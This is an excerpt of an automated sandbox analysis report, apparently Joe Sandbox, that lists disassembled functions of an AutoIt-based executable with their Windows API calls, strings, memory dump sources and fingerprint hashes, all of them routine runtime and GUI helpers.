                                                                  • Instruction ID: ba9d1a626623d0fcd6f71f64d7731f85eb3c8a4af978f735bcd8603da9f2e8ef
                                                                  • Opcode Fuzzy Hash: 03a05cd7ed26da5f42f9ac811281a39f178d5b8e4df78255d685f3138148f3d4
                                                                  • Instruction Fuzzy Hash: 70018475681116ABCB04F790D972DFE77AADF55340F5012297902A7281DA509E088BB6
                                                                  Function 006825A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,00000182,?,00000000), ref: 00682615
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: 3694b4f8832b771fa189cb866ccdd56bad7baebf253e99328e9d69426609d910
                                                                  • Instruction ID: 607785dfb506a38bc6ddd61429cbfbce9596cc2498fc4c7a06a8b20a0758c02c
                                                                  • Opcode Fuzzy Hash: 3694b4f8832b771fa189cb866ccdd56bad7baebf253e99328e9d69426609d910
                                                                  • Instruction Fuzzy Hash: 8B01F9B5A4111667CB05F7A0D921EFF77AADF15340F501229B802B3281EF619E0DDBB6
                                                                  Function 006826B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 006845FD: GetClassNameW.USER32(?,?,000000FF), ref: 00684620
                                                                  • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00682720
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClassMessageNameSend_wcslen
                                                                  • String ID: ComboBox$ListBox
                                                                  • API String ID: 624084870-1403004172
                                                                  • Opcode ID: 423c176ff5a1fb9cf368facab0230a3c30ee2d2d4814409974cbf848c8266383
                                                                  • Instruction ID: 97a5eebf7b541f2a98d36389549fd58dbc5b84ac9903a08288713b04289f3ac3
                                                                  • Opcode Fuzzy Hash: 423c176ff5a1fb9cf368facab0230a3c30ee2d2d4814409974cbf848c8266383
                                                                  • Instruction Fuzzy Hash: 1DF0F4B5A41225A7CB04F3A4DC61FFE736AEF05390F401A19B422A32C1EF60580C87A4
                                                                  Function 006B9AFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • DefDlgProcW.USER32(?,0000002B,?,?,?), ref: 006B9B6D
                                                                    • Part of subcall function 00622234: GetWindowLongW.USER32(?,000000EB), ref: 00622242
                                                                  • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 006B9B53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageProcSend
                                                                  • String ID: (o
                                                                  • API String ID: 982171247-1684096767
                                                                  • Opcode ID: 59cc5056f72b9ca9303eeaeff45898dc8f2c302b86fa1d47e29698dfe446e3c4
                                                                  • Instruction ID: eb6d88433947d2d00c1bba5f91b533b026010bd6a1c16f173b9980770ae4d4ef
                                                                  • Opcode Fuzzy Hash: 59cc5056f72b9ca9303eeaeff45898dc8f2c302b86fa1d47e29698dfe446e3c4
                                                                  • Instruction Fuzzy Hash: 1B01DF71201214BBCB25AF14EC54FE63BA7FB85365F100668FA120B2E0C7726896DF64
                                                                  Function 00653A62 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2<e$j3l
                                                                  • API String ID: 0-1518692914
                                                                  • Opcode ID: 02b3b253782144b164f036ca01e9538a0a53da3400be8c2dc62b141bc6193bb8
                                                                  • Instruction ID: 3f0aedebba72f34465a65e8b6971f40ad51e2a017022192f90b80933dd7f1eac
                                                                  • Opcode Fuzzy Hash: 02b3b253782144b164f036ca01e9538a0a53da3400be8c2dc62b141bc6193bb8
                                                                  • Instruction Fuzzy Hash: 15F0F035100158AADB148F90C840AF933AADB04B42F00406ABC89CB380EA758F85D365
                                                                  Function 006B8432 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0062249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006224B0
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B8471
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 006B847F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID: (o
                                                                  • API String ID: 1378638983-1684096767
                                                                  • Opcode ID: 7ce02a33514ab1e09e7452b239f7184540b5f959f3e676ec9760104e0d16694f
                                                                  • Instruction ID: 53a6dda573dbc479994c1d73142915715b210e2bb3db0714bab4129db007b9e6
                                                                  • Opcode Fuzzy Hash: 7ce02a33514ab1e09e7452b239f7184540b5f959f3e676ec9760104e0d16694f
                                                                  • Instruction Fuzzy Hash: 49F03C751012069FC704DF69DC549AA77ABFB86324B108629FA268B3B1EB709851DF50
                                                                  Function 00681461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0068146F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Message
                                                                  • String ID: AutoIt$Error allocating memory.
                                                                  • API String ID: 2030045667-4017498283
                                                                  • Opcode ID: 23968fcaeb8151e0e6e8de6be069b3d1c0b1168cef74bf9ffeb8690d7e728d19
                                                                  • Instruction ID: 87acc62d9bbda82ab558ee3fcf52802b70f70388393566118fcfa30d54b876b3
                                                                  • Opcode Fuzzy Hash: 23968fcaeb8151e0e6e8de6be069b3d1c0b1168cef74bf9ffeb8690d7e728d19
                                                                  • Instruction Fuzzy Hash: 6BE012722857252AE3543694AC03BC97A8B8B05B55F11442EB748AA5C39AF22590479D
                                                                  Function 006410B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0063FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006410E2,?,?,?,0062100A), ref: 0063FAD9
                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,0062100A), ref: 006410E6
                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0062100A), ref: 006410F5
                                                                  Strings
                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006410F0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                  • API String ID: 55579361-631824599
                                                                  • Opcode ID: 4c07c3414cf7890b43d4c629ace916630d9ea550bef40dafcf063c3a07ddfa9e
                                                                  • Instruction ID: 467a971088eb5d5dbc48f5ab085b117fd72ad0ef74b161a0b2558653739374e5
                                                                  • Opcode Fuzzy Hash: 4c07c3414cf7890b43d4c629ace916630d9ea550bef40dafcf063c3a07ddfa9e
                                                                  • Instruction Fuzzy Hash: 9DE06DB06007518BE3609F24E804B52BFE7EF05704F00892CE985CB651EBB5D484CF91
                                                                  Function 0063F114 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 0063F151
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: `5o$h5o
                                                                  • API String ID: 1385522511-1336408471
                                                                  • Opcode ID: 606716ff51ff4a74174eb0f42836e948ed876f35999fad930dcc836aea78161d
                                                                  • Instruction ID: c4aee6b6bebc5a141bb5f1072361836a892036164d83f2d053389874abc3056d
                                                                  • Opcode Fuzzy Hash: 606716ff51ff4a74174eb0f42836e948ed876f35999fad930dcc836aea78161d
                                                                  • Instruction Fuzzy Hash: E8E08635904938DBD754DB2CF9459E83367EB87320F100179E6168B3919B342A42DA98
                                                                  Function 006939D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 006939F0
                                                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00693A05
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Temp$FileNamePath
                                                                  • String ID: aut
                                                                  • API String ID: 3285503233-3010740371
                                                                  • Opcode ID: bb70fe1cf6413374305b0310d382a08efb37e1ac70efce1df8f58b36962c7f8a
                                                                  • Instruction ID: 6312f445ad234c211771a8d44692155295c3f944c142f2ebd95da96f135c9d3f
                                                                  • Opcode Fuzzy Hash: bb70fe1cf6413374305b0310d382a08efb37e1ac70efce1df8f58b36962c7f8a
                                                                  • Instruction Fuzzy Hash: 18D05EB250036867DB20A7699C0EFCB7A6CDB44710F0002A1BB5596091EAB0DA85CB90
                                                                  Function 006B2DF2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006B2E08
                                                                  • PostMessageW.USER32(00000000), ref: 006B2E0F
                                                                    • Part of subcall function 0068F292: Sleep.KERNEL32 ref: 0068F30A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: b0eee7a4636ed3b796d0d4c6223501c8b8b2b23389f031d88017332535b014ef
                                                                  • Instruction ID: 388bdea62926efcaae1b54e096623cb42d99493f028accef8455f2ddc0aa489f
                                                                  • Opcode Fuzzy Hash: b0eee7a4636ed3b796d0d4c6223501c8b8b2b23389f031d88017332535b014ef
                                                                  • Instruction Fuzzy Hash: EDD0A9323823007BE768B370AC0FFC26B129B04B00F1009247205AA0C0E8A068818658
                                                                  Function 006B2DBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006B2DC8
                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 006B2DDB
                                                                    • Part of subcall function 0068F292: Sleep.KERNEL32 ref: 0068F30A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FindMessagePostSleepWindow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 529655941-2988720461
                                                                  • Opcode ID: a75e2e3dc6b08d6f22152641d45c97231f11099e3622cdddfbadee6101132e81
                                                                  • Instruction ID: fd9e27add87d48edba50431fafb11860a86722a83def39022d7052a76f8d5c26
                                                                  • Opcode Fuzzy Hash: a75e2e3dc6b08d6f22152641d45c97231f11099e3622cdddfbadee6101132e81
                                                                  • Instruction Fuzzy Hash: 33D02236395300B7E778B370AC0FFD27B129F00B00F1009247309AE0C0E8E06881C754
                                                                  Function 0065C17D Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 0065C213
                                                                  • GetLastError.KERNEL32 ref: 0065C221
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0065C27C
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1717984340-0
                                                                  • Opcode ID: 81d60072cbafea172721198a33fb9e521230cf4c786d36ced923320bda8e81de
                                                                  • Instruction ID: f184396727c9acc47e236a38b9136b52f55a50f9e99e7db46031d0eeb67474e2
                                                                  • Opcode Fuzzy Hash: 81d60072cbafea172721198a33fb9e521230cf4c786d36ced923320bda8e81de
                                                                  • Instruction Fuzzy Hash: 3441F670600706EFDB218FE4C844AFA7BA7AF11732F254169FC55AB2A1EB308E45C760